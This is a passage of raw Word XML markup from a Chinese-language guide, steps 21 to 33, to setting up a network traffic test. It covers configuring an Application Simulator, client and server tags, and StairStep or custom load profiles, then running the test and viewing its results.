      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>点击Test-NewTest，创建一个新的测试</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>22、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>首先在Network Neighborhood 中把第一步中创建好的给引入进来</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>23、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在 Test Components 中点击 Add new，然后选择中第一个 Application Simulator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="606BE182" wp14:editId="25B71A89">
            <wp:extent cx="5211445" cy="2870200"/>
            <wp:effectExtent l="0" t="0" r="8255" b="6350"/>
            <wp:docPr id="2974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211445" cy="2870200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>24、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>单击新创建的Component 或者点击右侧的编辑按钮</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>25、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在新的界面中，首先红框中的 Client Tags 和 Server Tags 所指定的就是在 Neighborhood章节中提及的 IPv4 Static Host 中给每一段IP 所编辑的 Tags，通过这里的设定来确定哪段 IP是用于 Client 和 Server，再由这段 IP 在配置中 Container 设定的 Interface 值来确定由哪个逻辑端口仿真Client 和 Server，最终再根据占用端口的地方来确定由哪个真实的硬件端口去仿真Client 和 Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="0053045B" w:rsidRPr="002A0C5E">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="146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7C81B93B" wp14:editId="17AC06DF">
            <wp:extent cx="5210382" cy="2891980"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="2974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210382" cy="2891980"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>26、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>点击右上方的 Edit Load Profile 去进行测试时长的配置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="003E2FD5" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D9044FF" wp14:editId="62B3B603">
            <wp:extent cx="5239385" cy="1286510"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="29750"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jpe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239385" cy="1286510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>27、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>默认情况下会存在三个阶段，上升建立期、稳定传输期和下降关闭期</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="235A86F4" wp14:editId="62F80DC3">
            <wp:extent cx="5204871" cy="2873883"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="2975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jpe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204871" cy="2873883"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>28、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通过点击右下方的 Create New/Browse 可以查看更多选项</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>选择 StairStep</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="0053045B" w:rsidRPr="002A0C5E">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1460" w:right="1680" w:bottom="280" w:left="1680" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6134EAD9" wp14:editId="46226E15">
            <wp:extent cx="5172641" cy="3457575"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="2975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428" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5172641" cy="3457575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在这个模板中，我们可以设定一个阶段性爬坡的动作，比如被测场景为仿真阶段爬坡的过程，我们可以通过该模板去设定。日股在这个图中的爬坡动作的含义为，起始的新建值为1000，然后每 10 秒钟，新建的值增加 1000，即 11 秒时为 2000,21 秒时为 3000，以此类推逐步增加，最终新建值增加到 10000 后维持在这个数值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31E60102" wp14:editId="5FC17A59">
            <wp:extent cx="5200650" cy="2851785"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="297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jpe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200650" cy="2851785"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>选择Custom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="0053045B" w:rsidRPr="002A0C5E">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="150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1C7F9342" wp14:editId="6541062B">
            <wp:extent cx="5201024" cy="3486150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2975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430" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5201024" cy="3486150"/>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t>里面有大量的模板</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>可以引用</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>也</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>可以点击 New 创建一个</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>默认情况下与之前的一</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>样</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，分为三个阶段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="007969E7" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A968C7F" wp14:editId="4C9894B1">
            <wp:extent cx="5202555" cy="2858770"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2975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jpe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202555" cy="2858770"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>可以添加右侧的加号，对中间的稳定阶段增加多个阶段，可以让吞吐量逐渐的增加，也可以根据需要设定忽高忽低的吞吐量，去仿真更加真实的现网</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="148D18C1" wp14:editId="03FB5E69">
            <wp:extent cx="5277512" cy="1704784"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29756"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jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId432" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5277512" cy="1704784"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>29、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在截图位置引入之前创建好的 Application Profiles</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D61A1C2" wp14:editId="0587717D">
            <wp:extent cx="5234940" cy="4882515"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="2975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234940" cy="4882515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>30、如下</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>截图位置是配置最为重要的三个具体值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38196C00" wp14:editId="4251208E">
            <wp:extent cx="5293136" cy="2388870"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="2975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434" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5293136" cy="2388870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>31</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 返回主界面</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>点击右下角的 Save and Run，给该测试例起个名称</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>32、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在运行的过程中可以观察测试结果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="0053045B" w:rsidRPr="002A0C5E">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1580" w:right="1680" w:bottom="280" w:left="1680" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D5AB849" wp14:editId="5C5C940C">
            <wp:extent cx="5210792" cy="2848546"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2975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jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId435" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5210792" cy="2848546"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>33、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>测试完毕后会出现结果提示</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002E57FA" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66A86DCB" wp14:editId="6688F1FD">
            <wp:extent cx="5248275" cy="4345940"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="3174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248275" cy="4345940"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="009655A2" w:rsidRDefault="00F15694" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F15694" w:rsidRPr="009655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82" w:rsidRDefault="00CE1482" w:rsidP="008B15B3">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00CE1482" w:rsidRDefault="00CE1482" w:rsidP="008B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82" w:rsidRDefault="00CE1482" w:rsidP="008B15B3">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00CE1482" w:rsidRDefault="00CE1482" w:rsidP="008B1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96E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D358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25B1A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3F26F2D4"/>
    <w:lvl w:ilvl="0" w:tplc="42F4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43DB8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4F28341C"/>
    <w:lvl w:ilvl="0" w:tplc="7062C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26610"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="75BE7A9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3225A9F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8F68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B2C0E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0816A920"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="450" w:hanging="450"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="30"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="862" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="40"/>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C8964C3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7C765BD4"/>
    <w:lvl w:ilvl="0" w:tplc="DCA8C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49"/>
    <w:rsid w:val="000B4D68"/>
    <w:rsid w:val="000E4EBE"/>
    <w:rsid w:val="00207330"/>
    <w:rsid w:val="0021194C"/>
    <w:rsid w:val="003944FC"/>
    <w:rsid w:val="004056D3"/>
    <w:rsid w:val="00476849"/>
    <w:rsid w:val="004D4162"/>
    <w:rsid w:val="0053045B"/>
    <w:rsid w:val="005D3A07"/>
    <w:rsid w:val="006019AE"/>
    <w:rsid w:val="00725DEE"/>
    <w:rsid w:val="00730071"/>
    <w:rsid w:val="00832CE1"/>
    <w:rsid w:val="00856FBE"/>
    <w:rsid w:val="00864224"/>
